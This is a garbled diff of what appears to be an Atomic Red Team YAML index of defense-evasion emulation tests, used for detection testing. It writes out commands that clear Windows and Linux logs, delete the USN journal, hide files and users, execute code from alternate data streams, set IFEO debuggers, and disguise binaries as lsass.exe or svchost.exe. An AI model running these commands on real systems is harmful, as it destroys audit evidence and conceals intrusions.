- name: icacls - Grant permission to specified user or group recursively
|
|
|
|
|
description: 'Modifies the filesystem permissions of the specified folder and
|
|
|
|
|
contents to allow the specified user or group Full Control.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7635,12 +7693,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F /t
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: attrib - Remove read-only attribute
|
|
|
|
|
description: 'Removes the read-only attribute from a file or folder using the
|
|
|
|
|
attrib.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7652,12 +7710,12 @@ defense-evasion:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'attrib.exe -r #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (numeric mode)
|
|
|
|
|
description: 'Changes a file or folder''s permissions using chmod and a specified
|
|
|
|
|
numeric mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7674,12 +7732,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{numeric_mode} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (symbolic mode)
|
|
|
|
|
description: 'Changes a file or folder''s permissions using chmod and a specified
|
|
|
|
|
symbolic mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7696,12 +7754,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{symbolic_mode} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (numeric mode) recursively
|
|
|
|
|
description: 'Changes a file or folder''s permissions recursively using chmod
|
|
|
|
|
and a specified numeric mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7718,12 +7776,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{numeric_mode} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chmod - Change file or folder mode (symbolic mode) recursively
|
|
|
|
|
description: 'Changes a file or folder''s permissions recursively using chmod
|
|
|
|
|
and a specified symbolic mode.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7740,12 +7798,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chmod #{symbolic_mode} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership and group
|
|
|
|
|
description: 'Changes a file or folder''s ownership and group information using
|
|
|
|
|
chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7766,12 +7824,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner}:#{group} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership and group recursively
|
|
|
|
|
description: 'Changes a file or folder''s ownership and group information recursively
|
|
|
|
|
using chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7792,11 +7850,11 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner}:#{group} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder mode ownership only
|
|
|
|
|
description: 'Changes a file or folder''s ownership only using chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7813,11 +7871,11 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership recursively
|
|
|
|
|
description: 'Changes a file or folder''s ownership only recursively using chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7834,7 +7892,7 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chattr - Remove immutable file attribute
|
|
|
|
|
description: |
|
|
|
|
|
Remove's a file's `immutable` attribute using `chattr`.
|
|
|
|
@@ -7851,7 +7909,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'chattr -i #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1144:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -7930,7 +7988,7 @@ defense-evasion:
|
|
|
|
|
- name: Gatekeeper Bypass
|
|
|
|
|
description: 'Gatekeeper Bypass via command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7994,7 +8052,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable history collection
|
|
|
|
|
description: 'Disables history collection in shells
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -8089,7 +8147,7 @@ defense-evasion:
|
|
|
|
|
- name: Create a hidden file in a hidden directory
|
|
|
|
|
description: 'Creates a hidden file inside a hidden directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -8101,11 +8159,11 @@ defense-evasion:
|
|
|
|
|
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
|
|
|
|
|
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mac Hidden file
|
|
|
|
|
description: 'Hide a file on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8114,42 +8172,61 @@ defense-evasion:
|
|
|
|
|
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
|
|
|
|
|
40 00 FF FF FF FF 00 00"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows System File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as a system file using the attrib.exe
|
|
|
|
|
utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
|
|
|
|
|
and observe that the Attributes are "SA" for System and Archive.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158 > %TEMP%\T1158.txt
|
|
|
|
|
attrib.exe +s %TEMP%\T1158.txt
|
|
|
|
|
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
|
|
|
|
|
command: 'attrib.exe +s #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows Hidden File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
|
|
|
|
|
and observe that the Attributes are "SH" for System and Hidden.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158_hidden > %TEMP%\T1158_hidden.txt
|
|
|
|
|
attrib.exe +h %TEMP%\T1158_hidden.txt
|
|
|
|
|
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'attrib.exe +h #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Hidden files
|
|
|
|
|
description: 'Requires Apple Dev Tools
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8162,11 +8239,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'setfile -a V #(unknown)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hide a Directory
|
|
|
|
|
description: 'Hide a directory on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8177,11 +8254,11 @@ defense-evasion:
|
|
|
|
|
chflags hidden /var/tmp/T1158_mac.txt
|
|
|
|
|
cleanup_command: 'rm /var/tmp/T1158_mac.txt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show all hidden files
|
|
|
|
|
description: 'Show all hidden files on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8189,52 +8266,59 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'defaults write com.apple.finder AppleShowAllFiles YES
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS command prompt
|
|
|
|
|
description: 'Create an Alternate Data Stream with the command prompt. Write
|
|
|
|
|
access is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
|
|
|
|
|
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "%temp%\\T1158_has_ads_cmd.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "Normal Text." > #{file_name}
|
|
|
|
|
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
cleanup_command: 'del #{file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS PowerShell
|
|
|
|
|
description: 'Create an Alternate Data Stream with PowerShell. Write access
|
|
|
|
|
is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
|
|
|
|
|
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "$env:TEMP\\T1158_has_ads_powershell.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
@@ -8242,10 +8326,9 @@ defense-evasion:
|
|
|
|
|
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
|
|
|
|
|
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
|
|
|
|
|
set-content -path . -stream #{ads_filename} -value "test3"
|
|
|
|
|
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1147:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8293,7 +8376,7 @@ defense-evasion:
|
|
|
|
|
- name: Hidden Users
|
|
|
|
|
description: 'Add a hidden user on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8305,7 +8388,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1143:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -8377,7 +8460,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Start-Process #{powershell_command}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1183:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8467,7 +8550,7 @@ defense-evasion:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8485,15 +8568,15 @@ defense-evasion:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8597,7 +8680,7 @@ defense-evasion:
|
|
|
|
|
- name: Clear Logs
|
|
|
|
|
description: 'Upon execution this test will clear Windows Event Logs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8610,12 +8693,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wevtutil cl #{log_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: FSUtil
|
|
|
|
|
description: 'Manages the update sequence number (USN) change journal, which
|
|
|
|
|
provides a persistent log of all changes made to files on the volume.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8623,11 +8706,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'fsutil usn deletejournal /D C:
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rm -rf
|
|
|
|
|
description: 'Delete system and audit logs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -8641,7 +8724,7 @@ defense-evasion:
|
|
|
|
|
This technique was used by threat actor Rocke during the exploitation of Linux
|
|
|
|
|
web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8653,12 +8736,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo 0> /var/spool/mail/#{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Overwrite Linux Log
|
|
|
|
|
description: 'This test overwrites the specified log. This technique was used
|
|
|
|
|
by threat actor Rocke during the exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8670,12 +8753,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo 0> #{log_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete System Logs Using PowerShell
|
|
|
|
|
description: 'Recommended Detection: Monitor for use of the windows event log
|
|
|
|
|
filepath in PowerShell couple with delete arguments
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8687,11 +8770,11 @@ defense-evasion:
|
|
|
|
|
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
|
|
|
|
|
cleanup_command: 'Start-Service -Name EventLog
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete System Logs Using Clear-EventLogId
|
|
|
|
|
description: 'Clear event logs using built-in PowerShell commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8699,7 +8782,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Clear-EventLog -logname Application
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1202:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8891,7 +8974,7 @@ defense-evasion:
|
|
|
|
|
- name: Install root CA on CentOS/RHEL
|
|
|
|
|
description: 'Creates a root CA with openssl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8973,7 +9056,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the CheckIfInstallable class constructor runner instead
|
|
|
|
|
of executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9039,7 +9122,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the InstallHelper class constructor runner instead of
|
|
|
|
|
executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9106,7 +9189,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil class constructor method call
|
|
|
|
|
description: 'Executes the installer assembly class constructor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9173,7 +9256,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil Install method call
|
|
|
|
|
description: 'Executes the Install Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9240,7 +9323,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil Uninstall method call - /U variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9308,7 +9391,7 @@ defense-evasion:
|
|
|
|
|
variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9375,7 +9458,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil HelpText method call
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9443,7 +9526,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
|
|
|
|
|
using a nonstandard extension for the assembly.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9560,14 +9643,14 @@ defense-evasion:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1036:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -9693,7 +9776,7 @@ defense-evasion:
|
|
|
|
|
%SystemRoot%\Temp\lsass.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading as Linux crond process.
|
|
|
|
|
description: |
|
|
|
|
|
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
|
|
|
|
@@ -9722,7 +9805,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c %APPDATA%\notepad.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - wscript.exe running as svchost.exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
|
|
|
|
@@ -9738,7 +9821,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c %APPDATA%\svchost.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - powershell.exe running as taskhostw.exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
|
|
|
|
@@ -9754,7 +9837,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /K %APPDATA%\taskhostw.exe
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - non-windows exe running as windows exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
|
|
|
|
@@ -9787,12 +9870,12 @@ defense-evasion:
|
|
|
|
|
Stop-Process -ID $myT1036
|
|
|
|
|
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - windows exe running as different windows exe
|
|
|
|
|
description: 'Copies a windows exe, renames it as another windows exe, and launches
|
|
|
|
|
it to masquerade as second windows exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9813,7 +9896,7 @@ defense-evasion:
|
|
|
|
|
Stop-Process -ID $myT1036
|
|
|
|
|
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Malicious process Masquerading as LSM.exe
|
|
|
|
|
description: |
|
|
|
|
|
Detect LSM running from an incorrect directory and an incorrect service account
|
|
|
|
@@ -9914,10 +9997,9 @@ defense-evasion:
|
|
|
|
|
identifier: T1112
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Modify Registry of Current User Profile - cmd
|
|
|
|
|
description: 'Modify the registry of the currently logged in user using reg.exe
|
|
|
|
|
cia cmd console
|
|
|
